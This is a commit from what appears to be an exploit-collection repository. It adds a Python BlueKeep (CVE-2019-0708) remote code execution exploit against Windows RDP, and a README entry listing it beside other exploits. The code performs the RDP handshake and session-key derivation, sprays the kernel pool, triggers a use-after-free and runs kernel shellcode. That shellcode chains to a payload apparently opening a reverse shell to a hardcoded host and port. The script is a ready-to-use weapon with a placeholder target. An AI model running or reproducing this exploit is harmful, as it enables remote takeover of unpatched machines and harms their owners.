size = get_tpkt_size(resp[tpkt_offset:tpkt_offset+4])
if size <= len_msg:
parse_data(crypter, resp[tpkt_offset:tpkt_offset+size])
resp = resp[tpkt_offset+size:]
def get_data(crypter, data):
data_len = len(data)
print('len of data = %d' % data_len)
tpkt = data[0:4]
if tpkt[0] != 3:
print('Error not tpkt')
return
size = int.from_bytes(tpkt[2:4], byteorder='big')
print('size = %d' % size)
parse_data(crypter, data[:size])
parsed = size
while parsed < data_len:
tpkt = data[parsed:parsed+4]
if tpkt[0] != 3:
print('Error not tpkt')
return
size = int.from_bytes(tpkt[2:4], byteorder='big')
parse_data(crypter, data[parsed:parsed+size])
parsed = parsed + size
def parse_data(crypter, data):
tpkt = data[0:4]
ctop = data[4:7]
# PDU
pdu_type = data[7:8]
initiator = data[8:10]
channel_id = data[10:12]
print('data from %d to channel id = %d' % (int.from_bytes(initiator, byteorder='big'), int.from_bytes(channel_id, byteorder='big')))
sec_hdr_offset = data.find(b'\x08\x00\x00\x00')
sec_hdr = data[sec_hdr_offset:sec_hdr_offset+4]
print('sec_hdr: %s' % binascii.hexlify(sec_hdr))
sig = data[sec_hdr_offset+4:sec_hdr_offset+12]
print('sig: %s' % binascii.hexlify(sig))
enc_data = data[sec_hdr_offset+12:]
print('enc_data: %s' % binascii.hexlify(enc_data))
print('decrypted data: %s' % binascii.hexlify(crypter.decrypt(enc_data)))
def connect(s):
name = get_ran_name()
print('[+] initializing connection')
# x.224 connection initiation
s.sendall(connect_req(name))
s.recv(4096)
print('[+] sending basic settings exchange')
# basic settings exchange
s.sendall(mcs_connect_init_pdu())
p = s.recv(4096)
time.sleep(.25)
server_ran, pub_key, bit_len = parse_mcs_conn_resp(p)
client_ran = b'A'*32
# channel connection
print('[+] sending erect domain and attach user')
s.sendall(erect_domain_req())
s.sendall(attach_user_req())
time.sleep(.25)
s.recv(4096)
print('[+] sending channel join requests')
# join requests
channels = get_chan_join_req()
for channel in channels:
s.sendall(binascii.unhexlify(channel))
s.recv(4096)
print('[+] sending security exchange')
# security exchange
s.sendall(sec_exchange(pub_key, bit_len))
time.sleep(.5)
non_fips = rdp_crypto.non_fips(server_ran, client_ran)
crypter = rdp_crypto.rc4_crypter(non_fips)
# client info pdu
s.sendall(client_info(crypter, name))
s.recv(4096)
time.sleep(.5)
# encrypted data begins here
resp = s.recv(8192)
# get_data(crypter, resp)
# print('[+] finalizing connection sequence')
print('[+] sending client confirm')
# send client confirm active pdu
s.sendall(client_confirm(crypter))
time.sleep(.15)
resp = s.recv(8192)
# get_data(crypter, resp)
# send client sync
print('[+] sending client sync')
s.sendall(client_sync(crypter))
time.sleep(.15)
# send client cooperate
print('[+] sending client cooperate')
s.sendall(client_cooperate(crypter))
time.sleep(.15)
# send client control request
print('[+] sending client control req')
s.sendall(client_control_req(crypter))
time.sleep(.15)
resp = s.recv(8192)
# get_data(crypter, resp)
# send client persistent key length
print('[+] sending persistent key len')
s.sendall(client_persistent_key_len(crypter))
time.sleep(.15)
# send client font list
print('[+] sending client font list')
s.sendall(client_font_list(crypter))
print('[+] connection established')
# read_rdp_data(s, crypter)
return crypter

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import binascii
import hashlib
import rc4
import struct
class non_fips():
def __init__(self, server_ran, client_ran):
# PreMasterSecret = First192Bits(ClientRandom) + First192Bits(ServerRandom)
self.server_ran = server_ran
self.client_ran = client_ran
# PreMasterSecret
self.pms = self.client_ran[:24] + self.server_ran[:24]
# MasterSecret
self.ms = self.__get_master_secret()
# SessionKeyBlob
self.sess_key_blob = self.__get_sess_key_blob()
# MACKey128 = First128Bits(SessionKeyBlob)
# InitialClientDecryptKey128 = FinalHash(Second128Bits(SessionKeyBlob))
# InitialClientEncryptKey128 = FinalHash(Third128Bits(SessionKeyBlob))
def get_dec_key(self):
return rc4.RC4Key(self.__get_final_hash(self.sess_key_blob[16:32]))
def get_enc_key(self):
key = self.__get_final_hash(self.sess_key_blob[32:48])
return rc4.RC4Key(key), key
def get_mac_key(self):
#print('mac key')
#print(binascii.hexlify(self.sess_key_blob[:16]))
return self.sess_key_blob[:16]
# MasterSecret = PreMasterHash(0x41) + PreMasterHash(0x4242) + PreMasterHash(0x434343)
def __get_master_secret(self):
return self.__get_pm_hash(b'\x41') + self.__get_pm_hash(b'\x42'*2) + self.__get_pm_hash(b'\x43'*3)
# SessionKeyBlob = MasterHash(0x58) + MasterHash(0x5959) + MasterHash(0x5A5A5A)
def __get_sess_key_blob(self):
return self.__get_m_hash(b'\x58') + self.__get_m_hash(b'\x59'*2) + self.__get_m_hash(b'\x5a'*3)
# PreMasterHash(I) = SaltedHash(MasterSecret, I)
def __get_m_hash(self, I):
return self.__get_salted_hash(self.ms, I)
# PreMasterHash(I) = SaltedHash(PremasterSecret, I)
def __get_pm_hash(self, I):
return self.__get_salted_hash(self.pms, I)
# SaltedHash(S, I) = MD5(S + SHA(I + S + ClientRandom + ServerRandom))
def __get_salted_hash(self, S, I):
sha1Digest = hashlib.sha1()
md5Digest = hashlib.md5()
sha1Digest.update(I)
sha1Digest.update(S)
sha1Digest.update(self.client_ran)
sha1Digest.update(self.server_ran)
sha1Sig = sha1Digest.digest()
md5Digest.update(S)
md5Digest.update(sha1Sig)
return md5Digest.digest()
# FinalHash(K) = MD5(K + ClientRandom + ServerRandom)
def __get_final_hash(self, K):
md5Digest = hashlib.md5()
md5Digest.update(K)
md5Digest.update(self.client_ran)
md5Digest.update(self.server_ran)
md5Sig = md5Digest.digest()
#print('encrypt/decrypt key')
#print(binascii.hexlify(md5Sig))
return md5Sig
class rc4_crypter():
def __init__(self, non_fips):
# we are sploiting no need for decrypt as far as i've seen
self.enc_key, self.initial_key = non_fips.get_enc_key()
self.current_key = self.initial_key
self.dec_key = non_fips.get_dec_key()
self.mac_key = non_fips.get_mac_key()
self.enc_count = 0
def encrypt(self, data):
enc = rc4.crypt(self.enc_key, data)
self.increment()
return enc
def decrypt(self, data):
return rc4.crypt(self.dec_key, data)
# Pad1 = 0x36 repeated 40 times to give 320 bits
# Pad2 = 0x5C repeated 48 times to give 384 bits
#
# SHAComponent = SHA(MACKeyN + Pad1 + DataLength + Data)
# MACSignature = First64Bits(MD5(MACKeyN + Pad2 + SHAComponent))
def sign(self, data):
sha1Digest = hashlib.sha1()
md5Digest = hashlib.md5()
len_data = len(data)
len_data = struct.pack('<I', len_data)
sha1Digest.update(self.mac_key)
sha1Digest.update(b'\x36'*40)
sha1Digest.update(len_data)
sha1Digest.update(data)
sha1Sig = sha1Digest.digest()
md5Digest.update(self.mac_key)
md5Digest.update(b'\x5c'*48)
md5Digest.update(sha1Sig)
md5Sig = md5Digest.digest()
return md5Sig[:8]
def increment(self):
self.enc_count += 1
if self.enc_count == 4096:
self.update_enc_key()
self.enc_count = 0
def update_enc_key(self):
sha1Digest = hashlib.sha1()
md5Digest = hashlib.md5()
sha1Digest.update(self.initial_key)
sha1Digest.update(b"\x36" * 40)
sha1Digest.update(self.current_key)
sha1Sig = sha1Digest.digest()
md5Digest.update(self.initial_key)
md5Digest.update(b"\x5c" * 48)
md5Digest.update(sha1Sig)
tempKey128 = md5Digest.digest()
# If the key strength is 128 bits, then the temporary key (TempKey128) is used to
# reinitialize the associated RC4 substitution table. (For more information on RC4
# substitution table initialization, see [[SCHNEIER]] section 17.1.)
# S-TableEncrypt = InitRC4(TempKey128)
# RC4 is then used to encrypt TempKey128 to obtain the new 128-bit encryption key.
S_TableEncrypt = rc4.RC4Key(tempKey128)
# NewEncryptKey128 = RC4(TempKey128, S-TableEncrypt)
self.current_key = rc4.crypt(S_TableEncrypt, tempKey128)
# Finally, the associated RC4 substitution table is reinitialized with the new
# encryption key (NewEncryptKey128), which can then be used to encrypt a further 4,096 packets.
# S-Table = InitRC4(NewEncryptKey128)
self.enc_key = rc4.RC4Key(self.current_key)

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import rdp
import socket
import binascii
import time
def pool_spray(s, crypter, payload):
times = 10000
count = 0
while count < times:
count += 1
#print('time through %d' % count)
try:
s.sendall(rdp.write_virtual_channel(crypter, 7, 1005, payload))
except ConnectionResetError:
print('ConnectionResetError pool_spray Aborting')
quit()
def main():
# change to your target
host = '192.168.0.46'
port = 3389
times = 4000
count = 0
target = (host, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target)
crypter = rdp.connect(s)
# this address was choosen for the pool spray. it could be be
# modified for potentially higher success rates.
# in my testing against the win7 VM it is around 80% success
# 0x874ff028
shellcode_address = b'\x28\xf0\x4f\x87'
# replace buf with your shellcode
buf = b""
buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
buf += b"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
buf += b"\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x00\x22\x68"
buf += b"\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
buf += b"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"
buf += b"\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89"
buf += b"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66"
buf += b"\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44"
buf += b"\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"
buf += b"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"
buf += b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68"
buf += b"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
buf += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
# bluekeep_kshellcode_x86.asm
# ring 0 to ring 3 shellcode
shellcode = b""
shellcode += b"\x60\xe8\x00\x00\x00\x00\x5b\xe8\x26\x00\x00\x00"
shellcode += b"\xb9\x76\x01\x00\x00\x0f\x32\x8d\x7b\x3c\x39\xf8"
shellcode += b"\x74\x11\x39\x45\x00\x74\x06\x89\x45\x00\x89\x55"
shellcode += b"\x08\x89\xf8\x31\xd2\x0f\x30\x61\xf4\xeb\xfd\xc2"
shellcode += b"\x24\x00\x8d\xab\x00\x10\x00\x00\xc1\xed\x0c\xc1"
shellcode += b"\xe5\x0c\x83\xed\x50\xc3\xb9\x23\x00\x00\x00\x6a"
shellcode += b"\x30\x0f\xa1\x8e\xd9\x8e\xc1\x64\x8b\x0d\x40\x00"
shellcode += b"\x00\x00\x8b\x61\x04\x51\x9c\x60\xe8\x00\x00\x00"
shellcode += b"\x00\x5b\xe8\xcb\xff\xff\xff\x8b\x45\x00\x83\xc0"
shellcode += b"\x17\x89\x44\x24\x24\x31\xc0\x99\x42\xf0\x0f\xb0"
shellcode += b"\x55\x08\x75\x12\xb9\x76\x01\x00\x00\x99\x8b\x45"
shellcode += b"\x00\x0f\x30\xfb\xe8\x04\x00\x00\x00\xfa\x61\x9d"
shellcode += b"\xc3\x8b\x45\x00\xc1\xe8\x0c\xc1\xe0\x0c\x2d\x00"
shellcode += b"\x10\x00\x00\x66\x81\x38\x4d\x5a\x75\xf4\x89\x45"
shellcode += b"\x04\xb8\x78\x7c\xf4\xdb\xe8\xd3\x00\x00\x00\x97"
shellcode += b"\xb8\x3f\x5f\x64\x77\x57\xe8\xc7\x00\x00\x00\x29"
shellcode += b"\xf8\x89\xc1\x3d\x70\x01\x00\x00\x75\x03\x83\xc0"
shellcode += b"\x08\x8d\x58\x1c\x8d\x34\x1f\x64\xa1\x24\x01\x00"
shellcode += b"\x00\x8b\x36\x89\xf2\x29\xc2\x81\xfa\x00\x04\x00"
shellcode += b"\x00\x77\xf2\x52\xb8\xe1\x14\x01\x17\xe8\x9b\x00"
shellcode += b"\x00\x00\x8b\x40\x0a\x8d\x50\x04\x8d\x34\x0f\xe8"
shellcode += b"\xcb\x00\x00\x00\x3d\x5a\x6a\xfa\xc1\x74\x0e\x3d"
shellcode += b"\xd8\x83\xe0\x3e\x74\x07\x8b\x3c\x17\x29\xd7\xeb"
shellcode += b"\xe3\x89\x7d\x0c\x8d\x1c\x1f\x8d\x75\x10\x5f\x8b"
shellcode += b"\x5b\x04\xb8\x3e\x4c\xf8\xce\xe8\x61\x00\x00\x00"
shellcode += b"\x8b\x40\x0a\x3c\xa0\x77\x02\x2c\x08\x29\xf8\x83"
shellcode += b"\x7c\x03\xfc\x00\x74\xe1\x31\xc0\x55\x6a\x01\x55"
shellcode += b"\x50\xe8\x00\x00\x00\x00\x81\x04\x24\x92\x00\x00"
shellcode += b"\x00\x50\x53\x29\x3c\x24\x56\xb8\xc4\x5c\x19\x6d"
shellcode += b"\xe8\x25\x00\x00\x00\x31\xc0\x50\x50\x50\x56\xb8"
shellcode += b"\x34\x46\xcc\xaf\xe8\x15\x00\x00\x00\x85\xc0\x74"
shellcode += b"\xaa\x8b\x45\x1c\x80\x78\x0e\x01\x74\x07\x89\x00"
shellcode += b"\x89\x40\x04\xeb\x9a\xc3\xe8\x02\x00\x00\x00\xff"
shellcode += b"\xe0\x60\x8b\x6d\x04\x97\x8b\x45\x3c\x8b\x54\x05"
shellcode += b"\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\x49"
shellcode += b"\x8b\x34\x8b\x01\xee\xe8\x1d\x00\x00\x00\x39\xf8"
shellcode += b"\x75\xf1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b"
shellcode += b"\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24"
shellcode += b"\x1c\x61\xc3\x52\x31\xc0\x99\xac\xc1\xca\x0d\x01"
shellcode += b"\xc2\x85\xc0\x75\xf6\x92\x5a\xc3\x58\x89\x44\x24"
shellcode += b"\x10\x58\x59\x58\x5a\x60\x52\x51\x8b\x28\x31\xc0"
shellcode += b"\x64\xa2\x24\x00\x00\x00\x99\xb0\x40\x50\xc1\xe0"
shellcode += b"\x06\x50\x54\x52\x89\x11\x51\x4a\x52\xb8\xea\x99"
shellcode += b"\x6e\x57\xe8\x7b\xff\xff\xff\x85\xc0\x75\x4f\x58"
shellcode += b"\x8b\x38\xe8\x00\x00\x00\x00\x5e\x83\xc6\x55\xb9"
shellcode += b"\x00\x04\x00\x00\xf3\xa4\x8b\x45\x0c\x50\xb8\x48"
shellcode += b"\xb8\x18\xb8\xe8\x56\xff\xff\xff\x8b\x40\x0c\x8b"
shellcode += b"\x40\x14\x8b\x00\x66\x83\x78\x24\x18\x75\xf7\x8b"
shellcode += b"\x50\x28\x81\x7a\x0c\x33\x00\x32\x00\x75\xeb\x8b"
shellcode += b"\x58\x10\x89\x5d\x04\xb8\x5e\x51\x5e\x83\xe8\x32"
shellcode += b"\xff\xff\xff\x59\x89\x01\x31\xc0\x88\x45\x08\x40"
shellcode += b"\x64\xa2\x24\x00\x00\x00\x61\xc3\x5a\x58\x58\x59"
shellcode += b"\x51\x51\x51\xe8\x00\x00\x00\x00\x83\x04\x24\x09"
shellcode += b"\x51\x51\x52\xff\xe0\x31\xc0"
shellcode += buf
print('shellcode len: %d' % len(shellcode))
payload_size = 1600
payload = b'\x2c\xf0\x4f\x87' + shellcode
payload = payload + b'\x5a' * (payload_size - len(payload))
print('[+] spraying pool')
pool_spray(s, crypter, payload)
fake_obj_size = 168
call_offset = 108
fake_obj = b'\x00'*call_offset + shellcode_address
fake_obj = fake_obj + b'\x00' * (fake_obj_size - len(fake_obj))
time.sleep(.5)
print('[+] sending free')
s.sendall(rdp.free_32(crypter))
time.sleep(.15)
print('[+] allocating fake objects')
while count < times:
count += 1
#print('time through %d' % count)
try:
s.sendall(rdp.write_virtual_channel(crypter, 7, 1005, fake_obj))
except ConnectionResetError:
s.close()
s.close()
if __name__== "__main__":
main()

1
README.md
View File

@ -100,6 +100,7 @@
## PC ## PC
- [ 微软RDP远程代码执行漏洞CVE-2019-0708](./BlueKeep) - [ 微软RDP远程代码执行漏洞CVE-2019-0708](./BlueKeep)
- [CVE-2019-0708-python版](./BlueKeep/bluekeep-CVE-2019-0708-python)
- [MS17-010-微软永恒之蓝漏洞](https://github.com/Mr-xn/MS17-010) - [MS17-010-微软永恒之蓝漏洞](https://github.com/Mr-xn/MS17-010)
- [macOS-Kernel-Exploit](./macOS-Kernel-Exploit) - [macOS-Kernel-Exploit](./macOS-Kernel-Exploit)